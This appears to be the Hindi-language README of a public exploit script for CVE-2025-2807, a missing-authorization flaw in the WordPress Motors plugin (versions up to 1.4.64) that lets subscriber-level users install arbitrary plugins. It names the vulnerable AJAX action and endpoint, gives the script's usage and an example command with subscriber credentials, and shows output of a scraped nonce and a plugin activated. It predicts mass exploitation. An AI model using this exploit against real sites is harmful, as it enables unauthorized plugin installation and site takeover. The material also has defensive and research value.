
Wordpress - Motors Plugin <= 1.4.64 - मनमाना प्लगइन स्थापना भेद्यता
शोषण द्वारा: Nxploited | Khaled Alenazi
प्लगइन: Motors (<= 1.4.64)
प्रकार: प्रमाणित (सब्सक्राइबर+) के लिए लापता प्राधिकरण - मनमाना प्लगइन स्थापना
गंभीरता: 8.8 (CVSS v3)
खोज तिथि: 07 अप्रैल 2025
VDP: नहीं
यह भेद्यता किसी भी प्रमाणित WordPress उपयोगकर्ता (सब्सक्राइबर+) को बिना किसी उचित प्राधिकरण जांच के मनमाना प्लगइन स्थापित करने की अनुमति देती है।
mvl_setup_wizard_install_plugin फ़ंक्शन में क्षमता सत्यापन की कमी के कारण, एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता प्रशासकों के लिए आरक्षित कार्य कर सकता है।
📅 इसकी सरलता और गंभीर प्रभाव के कारण बड़े पैमाने पर शोषण किए जाने की उम्मीद है।
/wp-admin/admin-ajax.phpmvl_setup_wizard_install_plugincurrent_user_can('install_plugins') या इसी तरह की क्षमता जांच का अभावयह स्क्रिप्ट:
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]
CVE-2025-2807 के लिए शोषण द्वारा: Nxploited | Khaled Alenazi
options:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-u, --url URL WordPress साइट का आधार URL
-un, --username USERNAME सब्सक्राइबर उपयोगकर्ता नाम
-p, --password PASSWORD सब्सक्राइबर पासवर्ड
-pn, --plugin PLUGIN स्थापित करने के लिए प्लगइन (डिफ़ॉल्ट: contact-form-7)
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7
[*] लॉगिन कर रहा है...
[+] सफलतापूर्वक लॉगिन किया गया।
[*] सेटअप विज़ार्ड पृष्ठ लाया जा रहा है...
[+] HTML में नॉन्स मिला: 428cdf8347
[*] प्लगइन स्थापित करने का प्रयास: contact-form-7
[+] प्लगइन स्थापना अनुरोध सफलतापूर्वक भेजा गया!
[+] प्रतिक्रिया: {"success":true,"data":"Plugin succesfully activated"}